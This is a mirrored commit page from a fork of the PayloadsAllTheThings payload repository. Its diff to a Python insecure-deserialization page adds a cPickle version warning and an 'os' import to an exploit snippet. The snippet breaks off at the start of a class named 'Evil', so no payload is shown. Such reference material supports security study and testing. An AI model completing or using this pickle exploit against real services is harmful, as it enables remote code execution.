ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-22 14:43:45 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #486 from nerrorsec/patch-1

Browse Source 
import os
This commit is contained in:
Swissky 2022-04-18 20:58:40 +02:00 committed by GitHub
commit 4ea77223bb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Insecure Deserialization/Python.md
View File

@ -3,6 +3,7 @@
## Pickle ## Pickle
The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
:warning: `import cPickle` will only work on Python 2
```python ```python
import cPickle import cPickle
@ -32,7 +33,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python ```python
import cPickle import cPickle, os
from base64 import b64encode, b64decode from base64 import b64encode, b64decode
class Evil(object): class Evil(object):